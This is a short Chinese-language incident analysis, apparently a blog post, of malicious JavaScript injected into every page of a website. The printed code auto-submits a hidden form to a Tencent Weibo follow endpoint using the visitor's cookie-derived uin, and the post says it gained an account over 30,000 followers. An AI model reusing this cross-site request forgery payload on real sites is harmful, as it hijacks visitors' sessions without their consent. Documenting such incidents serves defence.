目前腾讯监控系统发现space.aili.com存在大量恶意的请求,通过xxx.qq.com以期望达到刷微博粉丝的效果
被插入代码截图如下(每个页面都有,框架被修改)
data:image/s3,"s3://crabby-images/21ccb/21ccb505c7e0da62eac87b3b7117e0992b0caf3c" alt=""
被插入的恶意代码为:
data:image/s3,"s3://crabby-images/73624/73624277558b25c922afbb3b0c8d2ee5ade546f0" alt=""
解码后为:
data:image/s3,"s3://crabby-images/fca78/fca78133e23e418df3e4da5bfeb6448e5c68536c" alt=""
格式化
1
2
3
4
5
6
7
| (function() {
window.u = "chunxi_lu";
window.mm = document.createElement("div");
window.mm.innerHTML = "<iframe style='display:none' name='mj'></iframe><form method='POST' id='mi' action='http://radio.t.qq.com/mini/follow.php' target='mj'><input type='hidden' value='" + window.u + "' name='u'/><input type='hidden' value='" + ((document.cookie.match(/(?:^|\s)uin=o(\d+)/) || ["", ""])[1] | 0) + "' name='uin'/></form>";
document.body.appendChild(window.mm);
document.getElementById("mi").submit();
})()
|
innerHTML被修改为
1
2
3
4
5
| <iframe style='display:none' name='mj'></iframe>
<form method='POST' id='mi' action='http://radio.t.qq.com/mini/follow.php' target='mj'>
<input type='hidden' value='" + window.u + "' name='u' />
<input type='hidden' value='" + ((document.cookie.match(/(?:^|\s)uin=o(\d+)/) || ["", ""])[1] | 0) + "' name='uin' />
</form>
|
粉丝数刷到3w+
data:image/s3,"s3://crabby-images/f7859/f78596e539e3aea6aa1b669befc7679daeb1abce" alt=""